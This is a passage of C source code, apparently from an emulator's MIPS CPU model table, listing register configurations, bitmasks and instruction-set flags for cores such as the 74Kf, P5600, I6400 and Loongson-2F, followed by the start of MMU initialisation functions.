= MIPS_CONFIG3 | (1 << CP0C3_VInt) | (1 << CP0C3_MT) | (1 << CP0C3_DSPP), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3778FF1F, .CP0_TCStatus_rw_bitmask = (0 << CP0TCSt_TCU3) | (0 << CP0TCSt_TCU2) | (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | (0 << CP0TCSt_TMX) | (1 << CP0TCSt_DT) | (1 << CP0TCSt_DA) | (1 << CP0TCSt_A) | (0x3 << CP0TCSt_TKSU) | (1 << CP0TCSt_IXMT) | (0xff << CP0TCSt_TASID), .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x95 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .CP0_SRSCtl = (0xf << CP0SRSCtl_HSS), .CP0_SRSConf0_rw_bitmask = 0x3fffffff, .CP0_SRSConf0 = (1U << CP0SRSC0_M) | (0x3fe << CP0SRSC0_SRS3) | (0x3fe << CP0SRSC0_SRS2) | (0x3fe << CP0SRSC0_SRS1), .CP0_SRSConf1_rw_bitmask = 0x3fffffff, .CP0_SRSConf1 = (1U << CP0SRSC1_M) | (0x3fe << CP0SRSC1_SRS6) | (0x3fe << CP0SRSC1_SRS5) | (0x3fe << CP0SRSC1_SRS4), .CP0_SRSConf2_rw_bitmask = 0x3fffffff, .CP0_SRSConf2 = (1U << CP0SRSC2_M) | (0x3fe << CP0SRSC2_SRS9) | (0x3fe << CP0SRSC2_SRS8) | (0x3fe << CP0SRSC2_SRS7), .CP0_SRSConf3_rw_bitmask = 0x3fffffff, .CP0_SRSConf3 = (1U << CP0SRSC3_M) | (0x3fe << CP0SRSC3_SRS12) | (0x3fe << CP0SRSC3_SRS11) | (0x3fe << CP0SRSC3_SRS10), .CP0_SRSConf4_rw_bitmask = 0x3fffffff, .CP0_SRSConf4 = (0x3fe << CP0SRSC4_SRS15) | (0x3fe << CP0SRSC4_SRS14) | (0x3fe << CP0SRSC4_SRS13), .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_MT, .mmu_type = MMU_TYPE_R4000, }, { .name = "74Kf", .CP0_PRid = 0x00019700, 
.CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3778FF1F, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_DSP_R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "M14K", .CP0_PRid = 0x00019b00, /* Config1 implemented, fixed mapping MMU, no virtual icache, uncached coherency. */ .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_KU) | (0x2 << CP0C0_K23) | (0x1 << CP0C0_AR) | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1, .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0x2 << CP0C3_ISA) | (1 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_FMT, }, { .name = "M14Kc", /* This is the TLB-based MMU core. */ .CP0_PRid = 0x00019c00, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0x2 << CP0C3_ISA) | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_R4000, }, { /* FIXME: * Config3: CMGCR, PW, VZ, CTXTC, CDMM, TL * Config4: MMUExtDef * Config5: MRP * FIR(FCR0): Has2008 * */ .name = "P5600", .CP0_PRid = 0x0001A800, .CP0_Config0 = MIPS_CONFIG0 | (1 << CP0C0_MM) | (1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0x3F << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_FP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_SC) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (2 << CP0C4_IE) | (0x1c << CP0C4_KScrExist), .CP0_Config4_rw_bitmask = 0, .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_EVA) | (1 << CP0C5_MVH) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_K) | (1 << CP0C5_CV) | (1 << CP0C5_MSAEn) | (1 << CP0C5_UFE) | (1 << CP0C5_FRE) | (1 << CP0C5_UFR), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3C68FF1F, .CP0_PageGrain_rw_bitmask = (1U << CP0PG_RIE) | (1 << CP0PG_XIE) | (1 << CP0PG_ELPA) | (1 << CP0PG_IEC), .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_UFRP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID), .CP1_fcr31 = (1 << FCR31_ABS2008) | 
(1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 40, .insn_flags = CPU_MIPS32R5 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU supporting MIPS32 Release 6 ISA. FIXME: Support IEEE 754-2008 FP. Eventually this should be replaced by a real CPU model. */ .name = "mips32r6-generic", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (2 << CP0C3_ISA) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1U << CP0C3_M), .CP0_Config4 = MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | (3 << CP0C4_IE) | (1U << CP0C4_M), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_LLB), .CP0_Config5_rw_bitmask = (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3058FF1F, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = 0, .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R6 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_R4000, }, { .name = "I7200", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (1 << CP0C0_MM) | (0x2 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = (1U << CP0C1_M) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_BI) | (1 << CP0C3_SC) | (3 << CP0C3_MMAR) | (1 << CP0C3_ISA_ON_EXC) | (1 << CP0C3_ISA) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_CTXTC) | (1 << CP0C3_VInt) | (1 << CP0C3_CDMM) | (1 << CP0C3_MT) | (1 << CP0C3_TL), .CP0_Config4 = MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | (2 << CP0C4_IE) | (1U << CP0C4_M), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_MVH) | (1 << CP0C5_LLB), .CP0_Config5_rw_bitmask = (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3158FF1F, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = 0, .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x02 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_NANOMIPS32 | ASE_DSP | ASE_DSP_R2 | ASE_DSP_R3 | ASE_MT, .mmu_type = MMU_TYPE_R4000, }, #if defined(TARGET_MIPS64) { .name = "R4000", .CP0_PRid = 0x00000400, /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ .CP0_Config0 = (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), /* Note: Config1 is only used internally, the R4000 has only Config0. 
*/ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .CP0_LLAddr_rw_bitmask = 0xFFFFFFFF, .CP0_LLAddr_shift = 4, .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3678FFFF, /* The R4000 has a full 64bit FPU but doesn't use the fcr0 bits. */ .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0x0183FFFF, .SEGBITS = 40, .PABITS = 36, .insn_flags = CPU_MIPS3, .mmu_type = MMU_TYPE_R4000, }, { .name = "VR5432", .CP0_PRid = 0x00005400, /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ .CP0_Config0 = (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .CP0_LLAddr_rw_bitmask = 0xFFFFFFFFL, .CP0_LLAddr_shift = 4, .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3678FFFF, /* The VR5432 has a full 64bit FPU but doesn't use the fcr0 bits. */ .CP1_fcr0 = (0x54 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 32, .insn_flags = CPU_VR54XX, .mmu_type = MMU_TYPE_R4000, }, { .name = "5Kc", .CP0_PRid = 0x00018100, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x12F8FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64, .mmu_type = MMU_TYPE_R4000, }, { .name = "5Kf", .CP0_PRid = 0x00018100, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36F8FFFF, /* The 5Kf has F64 / L / W but doesn't use the fcr0 bits. */ .CP1_fcr0 = (1 << FCR0_D) | (1 << FCR0_S) | (0x81 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64, .mmu_type = MMU_TYPE_R4000, }, { .name = "20Kc", /* We emulate a later version of the 20Kc, earlier ones had a broken WAIT instruction. */ .CP0_PRid = 0x000182a0, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT) | (1 << CP0C0_VI), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (47 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 1, .CP0_Status_rw_bitmask = 0x36FBFFFF, /* The 20Kc has F64 / L / W but doesn't use the fcr0 bits. */ .CP1_fcr0 = (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_D) | (1 << FCR0_S) | (0x82 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 36, .insn_flags = CPU_MIPS64 | ASE_MIPS3D, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU providing MIPS64 Release 2 features. 
FIXME: Eventually this should be replaced by a real CPU model. */ .name = "MIPS64R2-generic", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_LPA), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36FBFFFF, .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2 | ASE_MIPS3D, .mmu_type = MMU_TYPE_R4000, }, { .name = "5KEc", .CP0_PRid = 0x00018900, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x12F8FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "5KEf", .CP0_PRid = 0x00018900, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36F8FFFF, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x89 << FCR0_PRID) | (0x0 << FCR0_REV), .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "I6400", .CP0_PRid = 0x1A900, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (5 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (5 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (3 << CP0C4_IE) | (1 << CP0C4_AE) | (0xfc << CP0C4_KScrExist), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_VP) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_MSAEn) | (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x30D8FFFF, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = (1 << CP0PG_ELPA), 
.CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .MSAIR = 0x03 << MSAIR_ProcID, .SEGBITS = 48, .PABITS = 48, .insn_flags = CPU_MIPS64R6 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { .name = "I6500", .CP0_PRid = 0x1B000, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (5 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (5 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (3 << CP0C4_IE) | (1 << CP0C4_AE) | (0xfc << CP0C4_KScrExist), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_VP) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_MSAEn) | (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 64, .CCRes = 2, .CP0_Status_rw_bitmask = 0x30D8FFFF, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = (1 << CP0PG_ELPA), .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .MSAIR = 0x03 << MSAIR_ProcID, .SEGBITS = 48, .PABITS = 48, .insn_flags = CPU_MIPS64R6 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { .name = "Loongson-2E", .CP0_PRid = 0x6302, /* 64KB I-cache and d-cache. 4 way with 32 bit cache line size. */ .CP0_Config0 = (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | (0x1<<4) | (0x1<<1), /* Note: Config1 is only used internally, Loongson-2E has only Config0. */ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x35D0FFFF, .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 40, .insn_flags = CPU_LOONGSON2E, .mmu_type = MMU_TYPE_R4000, }, { .name = "Loongson-2F", .CP0_PRid = 0x6303, /* 64KB I-cache and d-cache. 4 way with 32 bit cache line size. */ .CP0_Config0 = (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | (0x1<<4) | (0x1<<1), /* Note: Config1 is only used internally, Loongson-2F has only Config0. */ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0xF5D0FF1F, /* Bits 7:5 not writable. */ .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 40, .insn_flags = CPU_LOONGSON2F, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU providing MIPS64 DSP R2 ASE features. FIXME: Eventually this should be replaced by a real CPU model. 
*/ .name = "mips64dspr2", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_LPA), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x37FBFFFF, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2 | ASE_DSP | ASE_DSP_R2, .mmu_type = MMU_TYPE_R4000, }, #endif }; const int mips_defs_number = ARRAY_SIZE(mips_defs); static void no_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1; env->tlb->map_address = &no_mmu_map_address; } static void fixed_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1; env->tlb->map_address = &fixed_mmu_map_address; } static void r4k_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1 + ((def->CP0_Config1 >> CP0C1_MMU) & 63); env->tlb->map_address = &r4k_map_address; env->tlb->helper_tlbwi = r4k_helper_tlbwi; env->tlb->helper_tlbwr = 